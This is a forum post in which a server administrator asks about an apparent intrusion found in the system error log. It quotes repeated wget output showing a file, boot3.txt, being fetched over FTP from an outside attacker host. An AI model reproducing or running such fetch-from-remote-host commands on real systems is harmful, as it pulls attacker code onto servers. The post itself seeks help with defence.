hacking attempt found in error_log

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The system error log (not the logs for the sites) recently had a
number of instances of
the stuff just below.  Does anyone recognize it?  How did it get there?

--16:57:12--  ftp://blackbird:*password*@nsmsystem.no-ip.info/boot3.txt
           => `boot3.txt'
Resolving nsmsystem.no-ip.info... 201.92.81.190
Connecting to nsmsystem.no-ip.info|201.92.81.190|:21... --16:57:12--
ftp://blackbird:*password*@nsmsystem.no-ip.info/boot3.txt
           => `boot3.txt'
Resolving nsmsystem.no-ip.info... 201.92.81.190
Connecting to nsmsystem.no-ip.info|201.92.81.190|:21... connected.
Logging in as blackbird ... connected.
Logging in as blackbird ... Logged in!
==> SYST ... Logged in!
==> SYST ... done.    ==> PWD ... done.    ==> PWD ... --16:57:13--
ftp://blackbird:*password*@nsmsystem.no-ip.info/boot3.txt
           => `boot3.txt'
Resolving nsmsystem.no-ip.info... done.
==> TYPE I ... done.
==> TYPE I ... 201.92.81.190
Connecting to nsmsystem.no-ip.info|201.92.81.190|:21... done.  ==> CWD
not needed.
==> SIZE boot3.txt ... done.  ==> CWD not needed.
==> SIZE boot3.txt ... connected.
Logging in as blackbird ... 33445
==> PASV ... 33445
==> PASV ... done.    ==> RETR boot3.txt ... done.    ==> RETR
boot3.txt ... done.
Length: 33445 (33K)

     0K .Logged in!
==> SYST ... done.
boot3.txt has sprung into existence.
Retrying.

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